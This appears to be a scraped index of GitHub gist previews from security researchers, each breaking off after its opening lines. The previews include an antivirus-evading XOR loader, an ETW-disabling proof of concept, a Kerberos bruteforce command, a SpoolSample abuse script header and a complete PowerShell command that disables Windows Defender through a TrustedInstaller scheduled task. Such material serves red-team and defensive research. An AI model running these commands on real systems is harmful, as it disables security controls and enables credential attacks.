aaaddress1

// memBruteforce.cpp by [email protected]
// brute search loaded moudules in memory
// rewrite from https://www.exploit-db.com/exploits/45293
#include <Windows.h>
#include <iostream>
#pragma warning(disable:4996)

bool isMemExist(size_t addr) {
    int retv;
    __asm {

muff-in

Assembly Language / Reversing / Malware Analysis / Game Hacking -resources

⭐Assembly Language

Modern x64 Assembly

https://www.youtube.com/playlist?list=PLKK11Ligqitg9MOX3-0tFT1Rmh3uJp7kA

Arno0x

/*
Author: Arno0x0x, Twitter: @Arno0x0x
Completely based on @Flangvik netloader

This partial rewrite of @Flangvik Netloader includes the following changes:

	- Allow loading of an XOR encrypted binary to bypass antiviruses
		To encrypt the initial binary you can use my Python transformFile.py script.
		Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor
		

xpn

// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)

#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43

AetherEternity

// Mozilla User Preferences
// To change a preference value, you can either:
// - modify it via the UI (e.g. via about:config in the browser); or
// - set it within a user.js file in your profile (create it if it doesn't exist).
//
// Profile folder location on different systems:
// Windows: C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default
// Mac OS X: Users/<username>/Library/Application Support/Firefox/Profiles/xxxxxxxx.default
// Linux: /home/<username>/.mozilla/firefox/xxxxxxxx.default

tyranid

$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')

jessefmoore

     _  _____ ___  __  __ ___ ____   ____  _____ ____    _____ _____    _    __  __
    / \|_   _/ _ \|  \/  |_ _/ ___| |  _ \| ____|  _ \  |_   _| ____|  / \  |  \/  |
   / _ \ | || | | | |\/| || | |     | |_) |  _| | | | |   | | |  _|   / _ \ | |\/| |
  / ___ \| || |_| | |  | || | |___  |  _ <| |___| |_| |   | | | |___ / ___ \| |  | |
 /_/   \_\_| \___/|_|  |_|___\____| |_| \_\_____|____/    |_| |_____/_/   \_\_|  |_|



[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)

Arno0x

/*

================================ Compile as a .Net DLL ==============================
	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs

*/

using System.Windows.Forms;

namespace TestNamespace

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

3xocyte

#!/usr/bin/env python

# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/

import os
import sys
import argparse
import binascii
import ConfigParser